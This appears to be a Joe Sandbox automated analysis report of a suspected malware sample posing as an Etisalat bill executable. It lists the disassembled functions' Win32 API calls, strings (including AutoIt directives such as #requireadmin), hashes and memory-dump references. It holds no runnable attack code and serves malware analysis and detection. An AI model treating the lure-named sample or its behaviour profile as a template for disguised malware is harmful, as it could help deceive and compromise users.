Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe
API String ID: 2506810119-2911957730
Opcode ID: e6dee6b50f2d7c2b042ce38e0c7575e0e9a68225fd2ccdc0409d4c25487e5897
Instruction ID: f0a1a7a39d0c59dc7f2243f0ed5d041099038e8dcb8f14d3152b876acc64d598
Opcode Fuzzy Hash: e6dee6b50f2d7c2b042ce38e0c7575e0e9a68225fd2ccdc0409d4c25487e5897
Instruction Fuzzy Hash: A0316F75A04218BBDF21DB99D889D9EBBFCFF95710B144267F404D7312D6708A40EB91

Function 0090C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0090C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0090C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00971990,01255A58), ref: 0090C395

Strings

0, xrefs: 0090C2DF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 16524dcd04f2572f7fa8183051b95a5a1057b26cc41fc3bb63a024c43c75c299
Instruction ID: 94bcfb0217da53e202c9587ccccf5608a562287b8355b86e9067020dcd81702c
Opcode Fuzzy Hash: 16524dcd04f2572f7fa8183051b95a5a1057b26cc41fc3bb63a024c43c75c299
Instruction Fuzzy Hash: C541A0B12183019FDB20DF29D884B5ABBE8EF85321F148B1DF9A5972D1D730E904CB62

Function 00934416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0093CC08,00000000,?,?,?,?), ref: 009344AA
GetWindowLongW.USER32 ref: 009344C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009344D7

Strings

SysTreeView32, xrefs: 0093447C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: b1faa37f096567bb82f38ec8c7ff50aa918ef0ee6f1215c7bd2c9aad708907ca
Instruction ID: 7ea707590ce6278e30360a07f89b9b1ad02336a77fd06cf1373a3778de46ed9e
Opcode Fuzzy Hash: b1faa37f096567bb82f38ec8c7ff50aa918ef0ee6f1215c7bd2c9aad708907ca
Instruction Fuzzy Hash: 1131AB72214605AFDB209E38DC45BEA7BA9EB09338F214725F979E22E0D770EC519B50

Function 0092304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0092335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00923077,?,?), ref: 00923378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0092307A
_wcslen.LIBCMT ref: 0092309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00923106

Strings

255.255.255.255, xrefs: 00923095, 0092309A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: f3a20b438c9ae6ac08abf08970e6b3cf479e0fc949fae867f7ea749c6e557955
Instruction ID: 0273c18833a827c373f4c43c0d8743670ba571f2bf3358837859294adb26ea5a
Opcode Fuzzy Hash: f3a20b438c9ae6ac08abf08970e6b3cf479e0fc949fae867f7ea749c6e557955
Instruction Fuzzy Hash: 0E31D0352042219FCB20CF68E486EAA77E4EF15318F24C459E8158B396CB3AEE45CB71

Function 00934653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00934705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00934713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0093471A

Strings

msctls_updown32, xrefs: 00934684

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f31bc6e15e4e04362dab25efc66d6d5083b863172b7aba7126b53e811022792f
Instruction ID: 4357b0a8b60b9ff911187ba552f0b6636da18df6059fb0b0d03dddedc28ae1e3
Opcode Fuzzy Hash: f31bc6e15e4e04362dab25efc66d6d5083b863172b7aba7126b53e811022792f
Instruction Fuzzy Hash: 8C215EB5604209AFEB10DF68DC81DA737ADEB5A3A8B050059FA059B251CB70FC51DE60

Function 009095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0090961D

Strings

#notrayicon, xrefs: 009095B7
#requireadmin, xrefs: 009095D9
#OnAutoItStartRegister, xrefs: 009095F3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 9731bc86764a5e86317b4f75277004b9e66d1be11e176e1a4c59377832e898cf
Instruction ID: 1260e3fad5442fd90a363d593365916baedcb062c3e2b6de58678d82fe68eecc
Opcode Fuzzy Hash: 9731bc86764a5e86317b4f75277004b9e66d1be11e176e1a4c59377832e898cf
Instruction Fuzzy Hash: 9F213872104611AED331AA299C16FB773ECEF91300F10442AF949DB1C3EB66DD41D296

Function 009337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00933840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00933850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00933876

Strings

Listbox, xrefs: 0093380F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 7ab8711ebcac30e30584158067bf1da0818618f8e93ed45f2d1131258d7d6e8b
Instruction ID: e53f7fe929fbb601f3dde5981ef44579231648897e94669a9ad68321bddd8886
Opcode Fuzzy Hash: 7ab8711ebcac30e30584158067bf1da0818618f8e93ed45f2d1131258d7d6e8b
Instruction Fuzzy Hash: 5B21A172654218BBEF218FA4DC85FBB376EEF89764F11C124F905AB190C671DC528BA0

Function 009149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00914A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00914A5C
SetErrorMode.KERNEL32(00000000,?,?,0093CC08), ref: 00914AD0

Strings

%lu, xrefs: 00914A6F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 8bb39496aaf81c86ce2f8f42d8e8ba8cc8ccf236267d493424109ceb6e47fd3b
Instruction ID: eaa645135d95816b93d31f45fee326e20d83ae1a27acf1ff38927aa40cf6047a
Opcode Fuzzy Hash: 8bb39496aaf81c86ce2f8f42d8e8ba8cc8ccf236267d493424109ceb6e47fd3b
Instruction Fuzzy Hash: 9C318F75A04108AFDB10DF58C885EAA7BF8FF09318F1480A4F909EB252D771EE45DB62

Function 009341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0093424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00934264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00934271

Strings

msctls_trackbar32, xrefs: 00934226

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7267bf1df6ff0816974b9b812188c12957739dde21cd8d76f53a0d45ee0b139b
Instruction ID: 31053619b3e0d70db68087b0989187e6bec88f4b2e439997b334f4a36f038c64
Opcode Fuzzy Hash: 7267bf1df6ff0816974b9b812188c12957739dde21cd8d76f53a0d45ee0b139b
Instruction Fuzzy Hash: B4110631240208BFEF205F69CC06FAB3BACEF95B58F020514FA55F20A0D271EC619B10

Function 00902F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

Part of subcall function 00902DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00902DC5
Part of subcall function 00902DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00902DD6
Part of subcall function 00902DA7: GetCurrentThreadId.KERNEL32 ref: 00902DDD
Part of subcall function 00902DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00902DE4

GetFocus.USER32 ref: 00902F78

Part of subcall function 00902DEE: GetParent.USER32(00000000), ref: 00902DF9

GetClassNameW.USER32(?,?,00000100), ref: 00902FC3
EnumChildWindows.USER32(?,0090303B), ref: 00902FEB

Strings

%s%d, xrefs: 00902FFF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 0db2ce897d24747e4328f7ca41018035717a3bae9b0ad5195c33fa8b469554e8
Instruction ID: 1cbb73910fd4c66609212be36dcee249d86a3eac32900ce4efbe76aba928e9ff
Opcode Fuzzy Hash: 0db2ce897d24747e4328f7ca41018035717a3bae9b0ad5195c33fa8b469554e8
Instruction Fuzzy Hash: B81190B1600205ABDF157F648C8AEED776EAF84318F049075B909AB2D2DE3099459B70

Function 00935882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009358C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009358EE
DrawMenuBar.USER32(?), ref: 009358FD

Strings

0, xrefs: 0093588F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: bb72e8d3369e46c50bdf2166b7626ec9741c2a19469ddeaced995bfe438b76c6
Instruction ID: a701943c0fb6234cad32916fa0a36aa5d223cffbdadb5bb355708549ad8a0d3c
Opcode Fuzzy Hash: bb72e8d3369e46c50bdf2166b7626ec9741c2a19469ddeaced995bfe438b76c6
Instruction Fuzzy Hash: F6018B71504208EFDB209F11DC48BAFBBB9FB49360F008099F848DA261DB308A80EF21

Function 008FD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 008FD3BF
FreeLibrary.KERNEL32 ref: 008FD3E5

Strings

X64, xrefs: 008FD2A8
GetSystemWow64DirectoryW, xrefs: 008FD3B9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: f392740da7ad44bcb4f2270d2122e7d6669e276c8392ae01ddd26256952632e9
Instruction ID: a440f2b90334d1f9b2ec10789574f91878514baf1154bf08e6a46473b522f1be
Opcode Fuzzy Hash: f392740da7ad44bcb4f2270d2122e7d6669e276c8392ae01ddd26256952632e9
Instruction Fuzzy Hash: 33F020A2809B299BE73112708C549BA3352FF00B05B548029AB02F6249E720DC45ABD3

Function 0090007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4806d44924b9b17b2ee6495fc086abe4c3440ae3859738e10957a591ead2c03c
Instruction ID: 8eae75f19c30ab7de9bd3886025bcd6c261d8e7a8a46062b4c65bcde94a9c779
Opcode Fuzzy Hash: 4806d44924b9b17b2ee6495fc086abe4c3440ae3859738e10957a591ead2c03c
Instruction Fuzzy Hash: C2C12B75A0020AEFDB15CF98C894BAEB7B9FF88704F108598E515EB291D731DE41DB90

Function 0092342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00923459
CoUninitialize.OLE32 ref: 00923463
VariantInit.OLEAUT32(?), ref: 0092346E
VariantClear.OLEAUT32(?), ref: 0092371B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 55430e1758ddd94ba43969babca8d80ef873198396a571e4d616f9b8bcf4e5ff
Instruction ID: 59205bf8a46ca652832df316f592c066a8f2347aea4da1a7a2bef34b8e90cb37
Opcode Fuzzy Hash: 55430e1758ddd94ba43969babca8d80ef873198396a571e4d616f9b8bcf4e5ff
Instruction Fuzzy Hash: 6EA15D756043109FD710EF28D885A2AB7E9FF89710F048859F98ADB366DB34ED01CB92

Function 00900436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0093FC08,?), ref: 009005F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0093FC08,?), ref: 00900608
CLSIDFromProgID.OLE32(?,?,00000000,0093CC40,000000FF,?,00000000,00000800,00000000,?,0093FC08,?), ref: 0090062D
_memcmp.LIBVCRUNTIME ref: 0090064E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 278d90c821901c28aa2237b84a959b0e05f03d48de66e9cb3653de630e510db3
Instruction ID: bd7c4cd2a6d43e465851d6576604f0dab86998134bfc16051ca460f9f53ef0a8
Opcode Fuzzy Hash: 278d90c821901c28aa2237b84a959b0e05f03d48de66e9cb3653de630e510db3
Instruction Fuzzy Hash: 4281E875A00109EFCB04DF94C984EEEB7BAFF89315F204558F506AB290DB71AE06CB60

Function 008E1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008E14C0

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2146d8b3a43adfc4f32875ff8a5b8b62df74dc47964020f3d36a2e48171c4764
Instruction ID: 95e0df1a3eba4bbdf6790cf1a05bfe993dd5a0b211da71d6a1f692f721ffcaf0
Opcode Fuzzy Hash: 2146d8b3a43adfc4f32875ff8a5b8b62df74dc47964020f3d36a2e48171c4764
Instruction Fuzzy Hash: 5F413A31600554ABEF217BBE8C49BAE3BB6FF43334F14422AF418D23D2E67488419267

Function 00936278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0125ECD0,?), ref: 009362E2
ScreenToClient.USER32(?,?), ref: 00936315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00936382

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7dcd17ee3fde7a4bd1c50699fc4ca1206e4c3f37573779db197a252bb5ca9084
Instruction ID: ee8c54f7e9a1718529b6995fad12445d51d03a08e0d1a0f60a0b2b65eb12e94f
Opcode Fuzzy Hash: 7dcd17ee3fde7a4bd1c50699fc4ca1206e4c3f37573779db197a252bb5ca9084
Instruction Fuzzy Hash: EB512975A00209AFDF14DF68D881AAE7BBAFB45360F108169F9659B2A0D730ED81DF50

Function 00921AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00921AFD
WSAGetLastError.WSOCK32 ref: 00921B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00921B8A
WSAGetLastError.WSOCK32 ref: 00921B94

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: cb6bbfa7ca57ab4c6b89e1af6ede0ac0dbeecae3d26cc0164a3893a9c88fc81e
Instruction ID: a56b2af6e4d9612e7fe4743ee1e6a246907ebc34831a990d4f8281925d040916
Opcode Fuzzy Hash: cb6bbfa7ca57ab4c6b89e1af6ede0ac0dbeecae3d26cc0164a3893a9c88fc81e
Instruction Fuzzy Hash: 8341F074600200AFE720AF28D886F2A77E5EB44708F548448F91A9F7D7E772ED41CB91

Function 008DB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
